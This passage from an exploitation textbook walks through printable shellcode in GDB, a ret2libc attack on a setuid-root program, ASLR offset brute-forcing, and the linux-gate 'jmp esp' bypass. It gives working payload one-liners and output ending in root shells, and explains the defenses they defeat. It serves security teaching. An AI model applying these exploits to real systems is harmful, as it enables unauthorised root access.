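Neat. In case you weren't able to follow everything that just happened there, the output below watches the execution of the printable shellcode in GDB. The stack addresses will be slightly different, changing the return addresses, but this won't affect the printable shellcode, which calculates its location based on ESP and is therefore versatile.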

reader@hacking:~/booksrc $ gdb -q ./update_info
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass update_product_description
Dump of assembler code for function update_product_description:
0x080484a8 <update_product_description+0>:      push   ebp
0x080484a9 <update_product_description+1>:      mov    ebp,esp
0x080484ab <update_product_description+3>:      sub    esp,0x28
0x080484ae <update_product_description+6>:      mov    eax,DWORD PTR [ebp+8]
0x080484b1 <update_product_description+9>:      mov    DWORD PTR [esp+4],eax
0x080484b5 <update_product_description+13>:     lea    eax,[ebp-24]
0x080484b8 <update_product_description+16>:     mov    DWORD PTR [esp],eax
0x080484bb <update_product_description+19>:     call   0x8048388 <strcpy@plt>
0x080484c0 <update_product_description+24>:     mov    eax,DWORD PTR [ebp+12]
0x080484c3 <update_product_description+27>:     mov    DWORD PTR [esp+8],eax
0x080484c7 <update_product_description+31>:     lea    eax,[ebp-24]
0x080484ca <update_product_description+34>:     mov    DWORD PTR [esp+4],eax
0x080484ce <update_product_description+38>:     mov    DWORD PTR [esp],0x80487a0
0x080484d5 <update_product_description+45>:     call   0x8048398 <printf@plt>
0x080484da <update_product_description+50>:     leave
0x080484db <update_product_description+51>:     ret
End of assembler dump.
(gdb) break *0x080484db
Breakpoint 1 at 0x80484db: file update_info.c, line 21.
(gdb) run $(perl -e 'print "AAAA"x10') $(cat ./printable)
Starting program: /home/reader/booksrc/update_info $(perl -e 'print "AAAA"x10') $(cat ./
printable)
[DEBUG]: desc argument is at 0xbffff8fd

Program received signal SIGSEGV, Segmentation fault.
0xb7f06bfb in strlen () from /lib/tls/i686/cmov/libc.so.6
(gdb) run $(perl -e 'print "\xfd\xf8\xff\xbf"x10') $(cat ./printable)
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/reader/booksrc/update_info $(perl -e 'print "\xfd\xf8\xff\xbf"
x10')
$(cat ./printable)
[DEBUG]: desc argument is at 0xbffff8fd
Updating product # with description 'TX-3399-Purr-!TTTP\%JONE%501:-%mm4-%mm%--DW%P-Yf1Y
-fwfY-
yzSzP-iii%-Zkx%-%Fw%P-XXn6-99w%-ptt%P-%w%%-qqqq-jPiXP-cccc-Dw0D-WICzP-c66c-W0TmP-TTTT
-%NN0-
%o42-7a-0P-xGGx-rrrx-aFOwP-pApA-N-w--B2H2PPPPPPPPPPPPPPPPPPPPPP'

Breakpoint 1, 0x080484db in update_product_description (
    id=0x72727550 <Address 0x72727550 out of bounds>,
    desc=0x5454212d <Address 0x5454212d out of bounds>) at update_info.c:21
21      }
(gdb)  stepi
0xbffff8fd in ?? ()
(gdb) x/9i $eip
0xbffff8fd:     push   esp
0xbffff8fe:     pop    eax
0xbffff8ff:     sub    eax,0x39393333
0xbffff904:     sub    eax,0x72727550
0xbffff909:     sub    eax,0x54545421
0xbffff90e:     push   eax
0xbffff90f:     pop    esp
0xbffff910:     and    eax,0x454e4f4a
0xbffff915:     and    eax,0x3a313035
(gdb) i r esp
esp            0xbffff6d0       0xbffff6d0
(gdb) p /x $esp + 860
$1 = 0xbffffa2c
(gdb) stepi 9
0xbffff91a in ?? ()
(gdb) i r esp eax
esp            0xbffffa2c       0xbffffa2c
eax            0x0      0
(gdb)

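The first nine instructions add 860 to ESP and zero out the EAX register. The next eight instructions push the last eight bytes of the shellcode to the stack in four-byte chunks. This process is repeated in the next 32 instructions to build the entire shellcode on the stack.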
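The effect of those first nine instructions can be modeled with plain 32-bit arithmetic. This is a sketch only; the function names are hypothetical, and registers are modeled as uint32_t values rather than real CPU state.

```c
#include <stdint.h>

/* Models: push esp / pop eax / three subs / push eax / pop esp.
 * The three printable constants sum to 0xfffffca4, which is -860
 * modulo 2^32, so subtracting them adds 860. */
uint32_t loader_adjust_esp(uint32_t esp)
{
    uint32_t eax = esp;
    eax -= 0x39393333u;
    eax -= 0x72727550u;
    eax -= 0x54545421u;
    return eax;   /* new ESP value */
}

/* Models the two and instructions. The masks share no set bits,
 * so any starting value ends up as zero. */
uint32_t loader_zero_eax(uint32_t eax)
{
    eax &= 0x454e4f4au;
    eax &= 0x3a313035u;
    return eax;
}
```

With the ESP value from the GDB session, 0xbffff6d0, the first function returns 0xbffffa2c, matching the register dump.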

(gdb) x/8i $eip
0xbffff91a:     sub    eax,0x346d6d25
0xbffff91f:     sub    eax,0x256d6d25
0xbffff924:     sub    eax,0x2557442d
0xbffff929:     push   eax
0xbffff92a:     sub    eax,0x59316659
0xbffff92f:     sub    eax,0x59667766
0xbffff934:     sub    eax,0x7a537a79
0xbffff939:     push   eax
(gdb) stepi 8
0xbffff93a in ?? ()
(gdb) x/4x $esp
0xbffffa24:     0x53e28951      0x80cde189      0x00000000      0x00000000
(gdb) stepi 32
0xbffff9ba in ?? ()
(gdb) x/5i $eip
0xbffff9ba:     push   eax
0xbffff9bb:     push   eax
0xbffff9bc:     push   eax
0xbffff9bd:     push   eax
0xbffff9be:     push   eax
(gdb) x/16x $esp
0xbffffa04:     0x90909090      0x31c03190      0x99c931db      0x80cda4b0
0xbffffa14:     0x51580b6a      0x732f2f68      0x622f6868      0xe3896e69
0xbffffa24:     0x53e28951      0x80cde189      0x00000000      0x00000000
0xbffffa34:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb)  i r eip esp eax
eip            0xbffff9ba       0xbffff9ba
esp            0xbffffa04       0xbffffa04
eax            0x90909090       -1869574000
(gdb)

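Now with the shellcode completely constructed on the stack, EAX is set to 0x90909090. This is pushed to the stack repeatedly to build a NOP sled that bridges the gap between the end of the loader code and the newly constructed shellcode.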

(gdb) x/24x 0xbffff9ba
0xbffff9ba:     0x50505050      0x50505050      0x50505050      0x50505050
0xbffff9ca:     0x50505050      0x00000050      0x00000000      0x00000000
0xbffff9da:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff9ea:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff9fa:     0x00000000      0x00000000      0x90900000      0x31909090
0xbffffa0a:     0x31db31c0      0xa4b099c9      0x0b6a80cd      0x2f685158
(gdb) stepi 10
0xbffff9c4 in ?? ()
(gdb) x/24x 0xbffff9ba
0xbffff9ba:     0x50505050      0x50505050      0x50505050      0x50505050
0xbffff9ca:     0x50505050      0x00000050      0x00000000      0x00000000
0xbffff9da:     0x90900000      0x90909090      0x90909090      0x90909090
0xbffff9ea:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff9fa:     0x90909090      0x90909090      0x90909090      0x31909090
0xbffffa0a:     0x31db31c0      0xa4b099c9      0x0b6a80cd      0x2f685158
(gdb) stepi 5
0xbffff9c9 in ?? ()
(gdb) x/24x 0xbffff9ba
0xbffff9ba:     0x50505050      0x50505050      0x50505050      0x90905050
0xbffff9ca:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff9da:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff9ea:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff9fa:     0x90909090      0x90909090      0x90909090      0x31909090
0xbffffa0a:     0x31db31c0      0xa4b099c9      0x0b6a80cd      0x2f685158
(gdb)

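Now the execution pointer (EIP) can flow over the NOP bridge into the constructed shellcode.

Printable shellcode is a technique that can open some doors. It and all the other techniques we discussed are just building blocks that can be used in a myriad of different combinations. Their application requires some ingenuity on your part. Be clever and beat them at their own game.

Hardening Countermeasures

The exploit techniques demonstrated in this chapter have been around for ages. It was only a matter of time before programmers came up with some clever protection methods. An exploit can be generalized as a three-step process: first, some sort of memory corruption; then, a change in control flow; and finally, execution of the shellcode.

Nonexecutable Stack

Most applications never need to execute anything on the stack, so an obvious defense against buffer overflow exploits is to make the stack nonexecutable. When this is done, shellcode inserted anywhere on the stack is basically useless. This type of defense will stop the majority of exploits out there, and it is becoming more popular. The latest version of OpenBSD has a nonexecutable stack by default, and a nonexecutable stack is available in Linux through PaX, a kernel patch.

ret2libc

Of course, there exists a technique used to bypass this protective countermeasure. This technique is known as returning into libc. libc is a standard C library that contains various basic functions, such as printf() and exit(). These functions are shared, so any program that uses the printf() function directs execution into the appropriate location in libc. An exploit can do the exact same thing and direct a program's execution into a certain function in libc. The functionality of such an exploit is limited by the functions in libc, which is a significant restriction when compared to arbitrary shellcode. However, nothing is ever executed on the stack.

Returning into system()

One of the simplest libc functions to return into is system(). As you recall, this function takes a single argument and executes that argument with /bin/sh. This function only needs a single argument, which makes it a useful target. For this example, a simple vulnerable program will be used.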

vuln.c

int main(int argc, char *argv[])
{
        char buffer[5];
        strcpy(buffer, argv[1]);
        return 0;
}

Of course, this program must be compiled and setuid root before it's truly vulnerable.

reader@hacking:~/booksrc $ gcc -o vuln vuln.c
reader@hacking:~/booksrc $ sudo chown root ./vuln
reader@hacking:~/booksrc $ sudo chmod u+s ./vuln
reader@hacking:~/booksrc $ ls -l ./vuln
-rwsr-xr-x 1 root reader 6600 2007-09-30 22:43 ./vuln

reader@hacking:~/booksrc $

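The general idea is to force the vulnerable program to spawn a shell, without executing anything on the stack, by returning into the libc function system(). If this function is supplied with the argument /bin/sh, this should spawn a shell.

First, the location of the system() function in libc must be determined. This will be different for every system, but once the location is known, it will remain the same until libc is recompiled. One of the easiest ways to find the location of a libc function is to create a simple dummy program and debug it, like this: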

reader@hacking:~/booksrc $ cat > dummy.c
int main()
{ system(); }
reader@hacking:~/booksrc $ gcc -o dummy dummy.c
reader@hacking:~/booksrc $ gdb -q ./dummy
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x804837a
(gdb) run
Starting program: /home/matrix/booksrc/dummy

Breakpoint 1, 0x0804837a in main ()
(gdb) print system
$1 = {<text variable, no debug info>} 0xb7ed0d80 <system>
(gdb) quit

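Here, a dummy program is created that uses the system() function. After it's compiled, the binary is opened in a debugger and a breakpoint is set at the beginning. The program is executed, and then the location of the system() function is displayed. In this case, the system() function is located at 0xb7ed0d80.

Armed with that knowledge, we can direct program execution into the system() function of libc. However, the goal here is to cause the vulnerable program to execute system("/bin/sh") to provide a shell, so an argument must be supplied. When returning into libc, the return address and function arguments are read off the stack in what should be a familiar format: the return address followed by the arguments. On the stack, the return-into-libc call should look something like this:

Figure 0x600-2.

Directly after the address of the desired libc function is the address to which execution should return after the libc call. After that, all of the function arguments come in sequence.

In this case, it doesn't really matter where the execution returns to after the libc call, since it will be opening an interactive shell. Therefore, these four bytes can just be a placeholder value of FAKE. There is only one argument, which should be a pointer to the string /bin/sh. This can be stored anywhere in memory; an environment variable is an excellent candidate. In the output below, the string is prefixed with several spaces. This will act similarly to a NOP sled, providing us with some wiggle room, since system("/bin/sh") is the same as system("     /bin/sh").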

reader@hacking:~/booksrc $ export BINSH="         /bin/sh"
reader@hacking:~/booksrc $ ./getenvaddr BINSH ./vuln
BINSH will be at 0xbffffe5b
reader@hacking:~/booksrc $

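So the system() address is 0xb7ed0d80, and the address for the /bin/sh string will be 0xbffffe5b when the program is executed. That means the return address on the stack should be overwritten with a series of addresses, beginning with 0xb7ed0d80, followed by FAKE (since it doesn't matter where execution goes after the system() call), and concluding with 0xbffffe5b.

A quick binary search shows that the return address is probably overwritten by the eighth word of the program input, so seven words (28 bytes) of dummy data are used for spacing in the exploit.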

reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x5')
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x10')
Segmentation fault
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x8')
Segmentation fault
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x7')
Illegal instruction
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x7 . "\x80\x0d\xed\xb7FAKE\x5b\xfe\xff\xbf"')
sh-3.2# whoami
root
sh-3.2#
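The byte layout produced by the perl one-liner can also be assembled in C. This is a sketch under stated assumptions: build_ret2libc and put_le32 are hypothetical names, and the addresses passed in are the ones observed in this particular session, which will differ on other systems.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Store a 32-bit value in little-endian byte order. */
static void put_le32(unsigned char *dst, uint32_t v)
{
    dst[0] = (unsigned char)(v & 0xff);
    dst[1] = (unsigned char)((v >> 8) & 0xff);
    dst[2] = (unsigned char)((v >> 16) & 0xff);
    dst[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Layout: pad_words of filler, then the function address, then a
 * placeholder return address, then the pointer argument.
 * Returns the number of bytes written, or 0 if out[] is too small. */
size_t build_ret2libc(unsigned char *out, size_t out_size, size_t pad_words,
                      uint32_t func_addr, uint32_t arg_addr)
{
    size_t need = pad_words * 4 + 12;

    if (out_size < need)
        return 0;

    for (size_t i = 0; i < pad_words; i++)
        memcpy(out + 4 * i, "ABCD", 4);           /* dummy spacing */

    put_le32(out + 4 * pad_words, func_addr);     /* overwrites the return address */
    memcpy(out + 4 * pad_words + 4, "FAKE", 4);   /* where system() would return */
    put_le32(out + 4 * pad_words + 8, arg_addr);  /* first argument to system() */
    return need;
}
```

Called with 7 padding words, 0xb7ed0d80, and 0xbffffe5b, it produces the same 40 bytes as the command line above.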

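If needed, the exploit can be expanded upon by making chained libc calls. The return address of FAKE used in the example can be changed to direct program execution. Additional libc calls can be made, or execution can be directed into some other useful section in the program's existing instructions.

Randomized Stack Space

Another protective countermeasure tries a slightly different approach. Instead of preventing execution on the stack, this countermeasure randomizes the stack memory layout. When the memory layout is randomized, the attacker won't be able to return execution into waiting shellcode, since he won't know where it is.

This countermeasure has been enabled by default in the Linux kernel since 2.6.12, but this book's LiveCD has been configured with it turned off. To turn this protection on again, echo 1 to the /proc filesystem as shown below.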

reader@hacking:~/booksrc $ sudo su -
root@hacking:~ # echo 1 > /proc/sys/kernel/randomize_va_space
root@hacking:~ # exit
logout
reader@hacking:~/booksrc $ gcc exploit_notesearch.c
reader@hacking:~/booksrc $ ./a.out
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
reader@hacking:~/booksrc $

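With this countermeasure turned on, the notesearch exploit no longer works, since the layout of the stack is randomized. Every time a program starts, the stack begins at a random location. The following example demonstrates this.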

aslr_demo.c

#include <stdio.h>

int main(int argc, char *argv[]) {
   char buffer[50];

   printf("buffer is at %p\n", &buffer);

   if(argc > 1)
      strcpy(buffer, argv[1]);

   return 1;
}

This program has an obvious buffer overflow vulnerability in it. However, with ASLR turned on, exploitation isn't that easy.

reader@hacking:~/booksrc $ gcc -g -o aslr_demo aslr_demo.c
reader@hacking:~/booksrc $ ./aslr_demo
buffer is at 0xbffbbf90
reader@hacking:~/booksrc $ ./aslr_demo
buffer is at 0xbfe4de20
reader@hacking:~/booksrc $ ./aslr_demo
buffer is at 0xbfc7ac50
reader@hacking:~/booksrc $ ./aslr_demo $(perl -e 'print "ABCD"x20')
buffer is at 0xbf9a4920
Segmentation fault
reader@hacking:~/booksrc $

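Notice how the location of the buffer on the stack changes with every run. We can still inject the shellcode and corrupt memory to overwrite the return address, but we don't know where the shellcode is in memory. The randomization changes the location of everything on the stack, including environment variables.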

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./aslr_demo
SHELLCODE will be at 0xbfd919c3
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./aslr_demo
SHELLCODE will be at 0xbfe499c3
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./aslr_demo
SHELLCODE will be at 0xbfcae9c3
reader@hacking:~/booksrc $

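This type of protection can be very effective in stopping exploits by the average attacker, but it isn't always enough to stop a determined hacker. Can you think of a way to successfully exploit this program under these conditions?

Investigations with BASH and GDB

Since ASLR doesn't stop the memory corruption, we can still use a brute-force BASH script to figure out the offset to the return address from the beginning of the buffer. When a program exits, the value returned from the main function is the exit status. This status is stored in the BASH variable $?, which can be used to detect whether the program crashed.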

reader@hacking:~/booksrc $ ./aslr_demo test
buffer is at 0xbfb80320
reader@hacking:~/booksrc $ echo $?
1
reader@hacking:~/booksrc $ ./aslr_demo $(perl -e 'print "AAAA"x50')
buffer is at 0xbfbe2ac0
Segmentation fault
reader@hacking:~/booksrc $ echo $?
139
reader@hacking:~/booksrc $
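The status 139 seen above follows the shell convention of reporting 128 plus the signal number when a command is killed by a signal; SIGSEGV is signal 11 on Linux. A small sketch of that decoding follows, with hypothetical function names.

```c
#include <signal.h>

/* Returns the signal number implied by a shell exit status,
 * or 0 if the status does not indicate death by signal. */
int signal_from_shell_status(int status)
{
    if (status > 128 && status < 256)
        return status - 128;
    return 0;
}

/* Returns nonzero if the status corresponds to a segmentation fault. */
int looks_like_segfault(int status)
{
    return signal_from_shell_status(status) == SIGSEGV;
}
```

A normal run of aslr_demo returns 1, so any status other than 1 signals that the input disturbed the program.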

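Using BASH's if statement logic, we can stop our brute-force script when it crashes the target. The if statement block is contained between the keywords then and fi; the whitespace in the if statement is required. The break statement tells the script to break out of the for loop.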

reader@hacking:~/booksrc $ for i in $(seq 1 50)
> do
> echo "Trying offset of $i words"
> ./aslr_demo $(perl -e "print 'AAAA'x$i")
> if [ $? != 1 ]
> then
> echo "==>  Correct offset to return address is $i words"
> break
> fi
> done
Trying offset of 1 words
buffer is at 0xbfc093b0
Trying offset of 2 words
buffer is at 0xbfd01ca0
Trying offset of 3 words
buffer is at 0xbfe45de0
Trying offset of 4 words
buffer is at 0xbfdcd560
Trying offset of 5 words
buffer is at 0xbfbf5380
Trying offset of 6 words
buffer is at 0xbffce760
Trying offset of 7 words
buffer is at 0xbfaf7a80
Trying offset of 8 words
buffer is at 0xbfa4e9d0
Trying offset of 9 words
buffer is at 0xbfacca50
Trying offset of 10 words
buffer is at 0xbfd08c80
Trying offset of 11 words
buffer is at 0xbff24ea0
Trying offset of 12 words
buffer is at 0xbfaf9a70
Trying offset of 13 words
buffer is at 0xbfe0fd80
Trying offset of 14 words
buffer is at 0xbfe03d70
Trying offset of 15 words
buffer is at 0xbfc2fb90
Trying offset of 16 words
buffer is at 0xbff32a40
Trying offset of 17 words
buffer is at 0xbf9da940
Trying offset of 18 words
buffer is at 0xbfd0cc70
Trying offset of 19 words
buffer is at 0xbf897ff0
Illegal instruction
==>  Correct offset to return address is 19 words
reader@hacking:~/booksrc $

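Knowing the proper offset will let us overwrite the return address. However, we still cannot execute shellcode since its location is randomized. Using GDB, let's look at the program just as it's about to return from the main function.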

reader@hacking:~/booksrc $ gdb -q ./aslr_demo
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass main
Dump of assembler code for function main:
0x080483b4 <main+0>:    push   ebp
0x080483b5 <main+1>:    mov    ebp,esp
0x080483b7 <main+3>:    sub    esp,0x58
0x080483ba <main+6>:    and    esp,0xfffffff0
0x080483bd <main+9>:    mov    eax,0x0
0x080483c2 <main+14>:   sub    esp,eax
0x080483c4 <main+16>:   lea    eax,[ebp-72]
0x080483c7 <main+19>:   mov    DWORD PTR [esp+4],eax
0x080483cb <main+23>:   mov    DWORD PTR [esp],0x80484d4
0x080483d2 <main+30>:   call   0x80482d4 <printf@plt>
0x080483d7 <main+35>:   cmp    DWORD PTR [ebp+8],0x1
0x080483db <main+39>:   jle    0x80483f4 <main+64>
0x080483dd <main+41>:   mov    eax,DWORD PTR [ebp+12]
0x080483e0 <main+44>:   add    eax,0x4
0x080483e3 <main+47>:   mov    eax,DWORD PTR [eax]
0x080483e5 <main+49>:   mov    DWORD PTR [esp+4],eax
0x080483e9 <main+53>:   lea    eax,[ebp-72]
0x080483ec <main+56>:   mov    DWORD PTR [esp],eax
0x080483ef <main+59>:   call   0x80482c4 <strcpy@plt>
0x080483f4 <main+64>:   mov    eax,0x1
0x080483f9 <main+69>:   leave
0x080483fa <main+70>:   ret
End of assembler dump.
(gdb) break *0x080483fa
Breakpoint 1 at 0x80483fa: file aslr_demo.c, line 12.
(gdb)

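The breakpoint is set at the last instruction of main. This instruction returns EIP to the return address stored on the stack. When an exploit overwrites the return address, this is the last instruction where the original program has control. Let's take a look at the registers at this point in the code for a couple of different trial runs.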

(gdb) run
Starting program: /home/reader/booksrc/aslr_demo
`buffer is at 0xbfa131a0`

Breakpoint 1, 0x080483fa in main (argc=134513588, argv=0x1) at aslr_demo.c:12
12      }
(gdb) info registers
eax            0x1      1
ecx            0x0      0
edx            0xb7f000b0       -1209007952
ebx            0xb7efeff4       -1209012236
`esp            0xbfa131`ec       0xbfa131ec
ebp            0xbfa13248       0xbfa13248
esi            0xb7f29ce0       -1208836896
edi            0x0      0
eip            0x80483fa        0x80483fa <main+70>
eflags         0x200246 [ PF ZF IF ID ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/aslr_demo
`buffer is at 0xbfd8e5`20

Breakpoint 1, 0x080483fa in main (argc=134513588, argv=0x1) at aslr_demo.c:12
12      }
(gdb) i r esp
`esp            0xbfd8e5`6c       0xbfd8e56c
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/aslr_demo
`buffer is at 0xbfaada`40

Breakpoint 1, 0x080483fa in main (argc=134513588, argv=0x1) at aslr_demo.c:12
12      }
(gdb) i r esp
`esp            0xbfaada`8c      0xbfaada8c
(gdb)

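Despite the randomization between runs, notice how similar the address in ESP is to the address of the buffer (shown in bold). This makes sense, since the stack pointer points to the stack and the buffer is on the stack. ESP's value and the buffer's address are changed by the same random value, because they are relative to each other.

GDB's stepi command steps the program forward in execution by a single instruction. Using this, we can check ESP's value after the ret instruction has executed.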

(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/aslr_demo
buffer is at 0xbfd1ccb0

Breakpoint 1, 0x080483fa in main (argc=134513588, argv=0x1) at aslr_demo.c:12
12      }
(gdb) i r esp
esp            0xbfd1ccfc       0xbfd1ccfc
(gdb) stepi
0xb7e4debc in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
(gdb) i r esp
esp            0xbfd1cd00       0xbfd1cd00
(gdb) x/24x 0xbfd1ccb0
0xbfd1ccb0:     0x00000000      0x080495cc      0xbfd1ccc8      0x08048291
0xbfd1ccc0:     0xb7f3d729      0xb7f74ff4      0xbfd1ccf8      0x08048429
0xbfd1ccd0:     0xb7f74ff4      0xbfd1cd8c      0xbfd1ccf8      0xb7f74ff4
0xbfd1cce0:     0xb7f937b0      0x08048410      0x00000000      0xb7f74ff4
0xbfd1ccf0:     0xb7f9fce0      0x08048410      0xbfd1cd58      0xb7e4debc
`0xbfd1cd00:     0x00000001`      0xbfd1cd84      0xbfd1cd8c      0xb7fa0898
(gdb) p 0xbfd1cd00 - 0xbfd1ccb0
$1 = 80
(gdb) p 80/4
$2 = 20
(gdb)

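Single stepping shows that the ret instruction increases the value of ESP by 4. Subtracting the address of the buffer from the value of ESP, we find that ESP is pointing 80 bytes (or 20 words) from the start of the buffer. Since the return address's offset was 19 words, this means that after main's final ret instruction, ESP is pointing to stack memory found directly after the return address. This would be useful if there were a way to control EIP to go where ESP is pointing instead.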
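The same distance can be computed for every run shown in the GDB sessions, which confirms that it is unaffected by the randomization. A one-function sketch, with a hypothetical name:

```c
#include <stdint.h>

/* Distance from the start of the buffer to ESP, in 4-byte words. */
uint32_t words_past_buffer(uint32_t buffer_addr, uint32_t esp)
{
    return (esp - buffer_addr) / 4;
}
```

At the breakpoint on ret, each trial run gives 19 words (ESP points at the return address); one stepi later it gives 20.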

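Bouncing Off linux-gate

The technique described below doesn't work with Linux kernels starting from 2.6.18. This technique gained some popularity and, of course, the developers patched the problem. The kernel used in the included LiveCD is 2.6.20, so the output below is from the machine loki, which is running a 2.6.17 Linux kernel. Even though this particular technique doesn't work on the LiveCD, the concepts behind it can be applied in other useful ways.

Bouncing off linux-gate refers to a shared object, exposed by the kernel, which looks like a shared library. The program ldd shows a program's shared library dependencies. Do you notice anything interesting about the linux-gate library in the output below?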

matrix@loki /hacking $ uname -a
Linux hacking 2.6.17 #2 SMP Sun Apr 11 03:42:05 UTC 2007 i686 GNU/Linux
matrix@loki /hacking $ cat /proc/sys/kernel/randomize_va_space
1
matrix@loki /hacking $ ldd ./aslr_demo
        `linux-gate.so.1 =>  (0xffffe000)`
        libc.so.6 => /lib/libc.so.6 (0xb7eb2000)
        /lib/ld-linux.so.2 (0xb7fe5000)
matrix@loki /hacking $ ldd /bin/ls
        `linux-gate.so.1 =>  (0xffffe000)`
        librt.so.1 => /lib/librt.so.1 (0xb7f95000)
        libc.so.6 => /lib/libc.so.6 (0xb7e75000)
        libpthread.so.0 => /lib/libpthread.so.0 (0xb7e62000)
        /lib/ld-linux.so.2 (0xb7fb1000)
matrix@loki /hacking $ ldd /bin/ls
        `linux-gate.so.1 =>  (0xffffe000)`
        librt.so.1 => /lib/librt.so.1 (0xb7f50000)
        libc.so.6 => /lib/libc.so.6 (0xb7e30000)
        libpthread.so.0 => /lib/libpthread.so.0 (0xb7e1d000)
        /lib/ld-linux.so.2 (0xb7f6c000)
matrix@loki /hacking $

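Even in different programs and with ASLR enabled, linux-gate.so.1 is always present at the same address. This is a virtual dynamically shared object used by the kernel to speed up system calls, which means it's needed in every process. It is loaded straight from the kernel and doesn't exist anywhere on disk.

The important thing is that every process has a block of memory containing linux-gate's instructions, which are always at the same location, even with ASLR. We are going to search this memory space for a certain assembly instruction, jmp esp. This instruction will jump EIP to where ESP is pointing.

First, we assemble the instruction to see what it looks like in machine code.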

matrix@loki /hacking $ cat > jmpesp.s
BITS 32
jmp esp
matrix@loki /hacking $ nasm jmpesp.s
matrix@loki /hacking $ hexdump -C jmpesp
00000000  ff e4                                             |..|
00000002
matrix@loki /hacking $

Using this information, a simple program can be written to find this pattern in the program's own memory.

find_jmpesp.c

#include <stdio.h>

int main()
{
  unsigned long linuxgate_start = 0xffffe000;
  char *ptr = (char *) linuxgate_start;

  int i;

  // Scan the 4096-byte page; stop one byte early so ptr[i+1] stays inside it.
  for(i=0; i < 4095; i++)
  {
    if(ptr[i] == '\xff' && ptr[i+1] == '\xe4')
      printf("found jmp esp at %p\n", ptr+i);
  }
}

When the program is compiled and run, it shows that this instruction exists at 0xffffe777. This can be further verified using GDB:

matrix@loki /hacking $ ./find_jmpesp
found jmp esp at 0xffffe777
matrix@loki /hacking $ gdb -q ./aslr_demo
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x80483f0: file aslr_demo.c, line 7.
(gdb) run
Starting program: /hacking/aslr_demo

Breakpoint 1, main (argc=1, argv=0xbf869894) at aslr_demo.c:7
7               printf("buffer is at %p\n", &buffer);
(gdb) x/i 0xffffe777
0xffffe777:     jmp    esp
(gdb)
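The search in find_jmpesp.c is tied to one fixed address. The same idea can be written as a bounds-checked routine over any byte buffer, sketched below; find_bytes is a hypothetical name and is not part of the book's sources.

```c
#include <stddef.h>
#include <string.h>

/* Returns the offset of the first occurrence of needle in hay,
 * or -1 if it does not occur. Never reads past hay_len. */
long find_bytes(const unsigned char *hay, size_t hay_len,
                const unsigned char *needle, size_t needle_len)
{
    if (needle_len == 0 || needle_len > hay_len)
        return -1;

    for (size_t i = 0; i + needle_len <= hay_len; i++) {
        if (memcmp(hay + i, needle, needle_len) == 0)
            return (long)i;
    }
    return -1;
}
```

Searching for the two bytes ff e4 in a copy of the linux-gate page would return the offset 0x777 on the loki machine shown above, assuming the page contents match that session.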

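Putting it all together, if we overwrite the return address with the address 0xffffe777, then execution will jump into linux-gate when the main function returns. Since this is a jmp esp instruction, execution will immediately jump right back out of linux-gate to wherever ESP happens to be pointing. From our previous debugging, we know that at the end of the main function, ESP is pointing at memory directly after the return address. So if shellcode is put here, EIP should bounce right into it.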

matrix@loki /hacking $ sudo chown root:root ./aslr_demo
matrix@loki /hacking $ sudo chmod u+s ./aslr_demo
matrix@loki /hacking $ ./aslr_demo $(perl -e 'print "\x77\xe7\xff\xff"x20')$(cat scode.bin)
buffer is at 0xbf8d9ae0
sh-3.1#

This technique can also be used to exploit the notesearch program, as shown here.

matrix@loki /hacking $ for i in `seq 1 50`; do ./notesearch $(perl -e "print 'AAAA'x$i"); if [ $? == 139 ]; then echo "Try $i words"; break; fi; done
[DEBUG] found a 34 byte note for user id 1000
[DEBUG] found a 41 byte note for user id 1000
[DEBUG] found a 63 byte note for user id 1000
-------[ end of note data ]-------

*** OUTPUT TRIMMED ***

[DEBUG] found a 34 byte note for user id 1000
[DEBUG] found a 41 byte note for user id 1000
[DEBUG] found a 63 byte note for user id 1000
-------[ end of note data ]-------
Segmentation fault
Try 35 words
matrix@loki /hacking $ ./notesearch $(perl -e 'print "\x77\xe7\xff\xff"x35')$(cat scode.bin)
[DEBUG] found a 34 byte note for user id 1000
[DEBUG] found a 41 byte note for user id 1000
[DEBUG] found a 63 byte note for user id 1000
-------[ end of note data ]-------
Segmentation fault
matrix@loki /hacking $ ./notesearch $(perl -e 'print "\x77\xe7\xff\xff"x36')$(cat scode2.bin)
[DEBUG] found a 34 byte note for user id 1000
[DEBUG] found a 41 byte note for user id 1000
[DEBUG] found a 63 byte note for user id 1000
-------[ end of note data ]------- 
sh-3.1#

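The initial estimate of 35 words was off, since the program still crashed with the slightly smaller exploit buffer. But it is in the right ballpark, so a manual tweak (or a more accurate way to calculate the offset) is all that is needed.

Sure, bouncing off linux-gate is a slick trick, but it only works with older Linux kernels. Back on the LiveCD, running Linux 2.6.20, the useful instruction is no longer found in the usual address space.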

reader@hacking:~/booksrc $ uname -a
Linux hacking 2.6.20-15-generic #2 SMP Sun Apr 15 07:36:31 UTC 2007 i686 GNU/Linux
